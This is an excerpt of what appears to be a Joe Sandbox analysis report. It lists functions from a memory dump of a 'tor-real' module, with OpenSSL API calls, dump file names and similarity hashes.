                                                                            Function 6C09EB43 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Init$memcpy$A224_A256_A384_D_typeX_md
                                                                            • String ID: $($3$@
                                                                            • API String ID: 2970115762-2970879633
                                                                            • Opcode ID: a282e56b5b532d9b667d5d92d4a19b5d9ae1147f475ae090617b7127338011c4
                                                                            • Instruction ID: 3e23c79d439a64d580f54a7ae9dc9bc540b7031f9457f834156c49763825c7d1
                                                                            • Opcode Fuzzy Hash: a282e56b5b532d9b667d5d92d4a19b5d9ae1147f475ae090617b7127338011c4
                                                                            • Instruction Fuzzy Hash: D2B10375A083518FD320CF29C88075AFBE2BFC9304F15892EE9E897351D775E9498B82
                                                                            Function 6C0E49F0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4A60
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4ADB
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B16
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B8D
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4BCD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4C0D
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4C57
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_malloc$R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 413598087-3554254475
                                                                            • Opcode ID: b6b5522d9acddd346458c489cc32d4eda2cffb18d846eb58108a8052510edb8f
                                                                            • Instruction ID: 4cc9297d7f6c97a6c5ac57511cd31de47b2e0d3f05763fa682fd219c4620bc88
                                                                            • Opcode Fuzzy Hash: b6b5522d9acddd346458c489cc32d4eda2cffb18d846eb58108a8052510edb8f
                                                                            • Instruction Fuzzy Hash: 0E619B75A083109FC7009FA5C18035ABBE1FFC8718F25CA6CE9989B754E774E846CB46
                                                                            Function 6C0966E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 161COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_malloc
                                                                            • String ID: D$P
                                                                            • API String ID: 2767441526-307317852
                                                                            • Opcode ID: 0346fc124dcaa0779f0702869484e4bc74f11ea74f1667db41d9b41cab18b900
                                                                            • Instruction ID: 0ea8a91954fda80a77e6ae7ab62f3bf10c4f2be6b10c729b345ee97350a7fdc2
                                                                            • Opcode Fuzzy Hash: 0346fc124dcaa0779f0702869484e4bc74f11ea74f1667db41d9b41cab18b900
                                                                            • Instruction Fuzzy Hash: 4081EEB45097058FE710DF29C08079BFBE0BF88318F108A2DE9A98B751C775A994CB86
                                                                            Function 6C0BA940 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_reallocmemcpy
                                                                            • String ID: A
                                                                            • API String ID: 1318616892-3554254475
                                                                            • Opcode ID: 51743af754fd3bcce524d2e2d0c8f86c50632710a6da806f00ca67b6d18c4969
                                                                            • Instruction ID: 66d48abe408c7e925e0b47c35e680bb9f6dde37fc7b634172ecda39568fe55c6
                                                                            • Opcode Fuzzy Hash: 51743af754fd3bcce524d2e2d0c8f86c50632710a6da806f00ca67b6d18c4969
                                                                            • Instruction Fuzzy Hash: 984148B52093059FE700DF29C58474FFBE0BF84308F14892DE5A8AB760DB7AD5448B56
                                                                            Function 6C0B4D23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B44A6
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B4539
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0B4566
                                                                            • OPENSSL_sk_insert.LIBCRYPTO-1_1 ref: 6C0B45C0
                                                                            • X509_VERIFY_PARAM_get_depth.LIBCRYPTO-1_1 ref: 6C0B46A3
                                                                            • X509_VERIFY_PARAM_set_depth.LIBCRYPTO-1_1 ref: 6C0B46B5
                                                                            • CRYPTO_dup_ex_data.LIBCRYPTO-1_1 ref: 6C0B46ED
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0B4738
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0B4754
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0B476C
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0B4784
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B479C
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0B47B4
                                                                            • X509_VERIFY_PARAM_inherit.LIBCRYPTO-1_1 ref: 6C0B4800
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0B4812
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0B4832
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B4D2F
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0B4D63
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4D97
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B4DA3
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4DC2
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4DCD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4DE5
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B4E4A
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B4E54
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4E86
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4E91
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4EA9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_free$O_free$X509_$L_sk_dupR_put_errorX509_freeY_free$L_sk_insertL_sk_new_nullL_sk_numL_sk_pushL_sk_valueM_get_depthM_inheritM_set_depthO_dup_ex_dataX509_get0_pubkey
                                                                            • String ID: A
                                                                            • API String ID: 3084767314-3554254475
                                                                            • Opcode ID: a88a1aab1b7fce2a009fc29ec6f8ee2c38ceec5ce1364836decad0cd7f77188c
                                                                            • Instruction ID: d5730d95c30d108aff9dd20534d84065abbf70bcdb1a816c9af3473bfe3962a5
                                                                            • Opcode Fuzzy Hash: a88a1aab1b7fce2a009fc29ec6f8ee2c38ceec5ce1364836decad0cd7f77188c
                                                                            • Instruction Fuzzy Hash: 99215871608700AFD700DFA4C58035EBBF0EF89758F618D1CE5A89BB40D73AE9458B86
                                                                            Function 6C0BE8E5 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0BEB6F
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0BEB93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_strdup
                                                                            • String ID: D$m$p
                                                                            • API String ID: 2148955802-2783181076
                                                                            • Opcode ID: 1a72b6863c04f2b0cbeaf272175212cb9ea9b42c8ee982f6fb552c88561e606f
                                                                            • Instruction ID: 5ebd35788c7d61ebb992a32ab78345cc58f15547c3635ae3d2f808294ada0905
                                                                            • Opcode Fuzzy Hash: 1a72b6863c04f2b0cbeaf272175212cb9ea9b42c8ee982f6fb552c88561e606f
                                                                            • Instruction Fuzzy Hash: A2B116706097018FE710DF25C48479ABBE0BF85348F1589ACE8A9AB751D776E948CFC2
                                                                            Function 6C094C29 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094C98
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094D17
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094D6C
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C094DA7
                                                                            • BUF_MEM_grow.LIBCRYPTO-1_1 ref: 6C094DF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc$M_growO_freeR_put_error
                                                                            • String ID: b$m
                                                                            • API String ID: 945272380-1996044831
                                                                            • Opcode ID: 335388741636d897dddc8802415f552e69e85cfb5ca00dbc1e361828e76e3b3e
                                                                            • Instruction ID: 0adc13faae665b4debec00d1233adca8fcd3f388a5a0238ecf742d3584dd1a9f
                                                                            • Opcode Fuzzy Hash: 335388741636d897dddc8802415f552e69e85cfb5ca00dbc1e361828e76e3b3e
                                                                            • Instruction Fuzzy Hash: 6D5189B66053008FDB04DF69E48038ABBE0EF84728F14866DDDA88F755D376E494CBA1
                                                                            Function 6C0BAB3C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_reallocmemcpy
                                                                            • String ID: A
                                                                            • API String ID: 1318616892-3554254475
                                                                            • Opcode ID: 0cdf5b905ae595b14ebcf431cc4d51c332d439585fb3f91126b69ff2c68edb0a
                                                                            • Instruction ID: f151fba9758684128ac651d715a2e62c6ea8b5686ac1125ceb949e3a78533898
                                                                            • Opcode Fuzzy Hash: 0cdf5b905ae595b14ebcf431cc4d51c332d439585fb3f91126b69ff2c68edb0a
                                                                            • Instruction Fuzzy Hash: C9515AB52093029FE300DF65C58475FBBE0FF84708F64892DE498AB750D77AE5488B96
                                                                            Function 6C0BC500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT ref: 6C0BC567
                                                                            • CRYPTO_THREAD_read_lock.LIBCRYPTO-1_1 ref: 6C0BC583
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BC598
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC5BA
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC5EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock$D_read_lockH_retrievememcpy
                                                                            • String ID:
                                                                            • API String ID: 3379989983-3916222277
                                                                            • Opcode ID: 579e5e4b0c9e0ab65a0ca062cbdeb763a37ed98119ef52b61cf023a048a4c7b6
                                                                            • Instruction ID: 7c1f10860a8383c35283738a635916c36bc5635b6de4f4f783b7ca05ec0a3f51
                                                                            • Opcode Fuzzy Hash: 579e5e4b0c9e0ab65a0ca062cbdeb763a37ed98119ef52b61cf023a048a4c7b6
                                                                            • Instruction Fuzzy Hash: E24116746097469FC314EF65C884B9ABBE0FF88348F014A2DE898DB701D771E984CB92
                                                                            Function 6C096440 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: X
                                                                            • API String ID: 2581946324-3081909835
                                                                            • Opcode ID: 02d6edc35b82a25661939678f09a02e981e3aeb08149b768732b48a2be39c85b
                                                                            • Instruction ID: a802956baf35c6aad317f3eb87cfde11b5d3e26c824fc94e9eab90fe3b8c2dd3
                                                                            • Opcode Fuzzy Hash: 02d6edc35b82a25661939678f09a02e981e3aeb08149b768732b48a2be39c85b
                                                                            • Instruction Fuzzy Hash: 7441D5B4109B018FC700DFAAD49475EBBE0BF48315F419A2CE9C98BB60D735E884DB85
                                                                            Function 6C09CFC4 Relevance: 12.1, APIs: 8, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • COMP_expand_block.LIBCRYPTO-1_1 ref: 6C09C9A0
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1 ref: 6C09CFD1
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1 ref: 6C09CFE7
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C09CFEF
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C09D076
                                                                            • EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 6C09D0BE
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C09D0C6
                                                                            • EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 6C09D0EB
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C09D0F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_flagsX_cipherX_md$D_sizeO_memcmpP_expand_block
                                                                            • String ID:
                                                                            • API String ID: 4037436298-0
                                                                            • Opcode ID: ca5091036766ebc107559f7f6bcd6c43288cbf7efbc34d2ab93c980c68d33fe0
                                                                            • Instruction ID: 817ea07c494b77fd0a1adbd35575e0a1bee6241b891aa72d31df64216416c04c
                                                                            • Opcode Fuzzy Hash: ca5091036766ebc107559f7f6bcd6c43288cbf7efbc34d2ab93c980c68d33fe0
                                                                            • Instruction Fuzzy Hash: D6411EB0849305CFDB109F25C08474ABBF0AF88358F519D2EE8A8DBA50E734E985DB16
                                                                            Function 6C09EC83 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
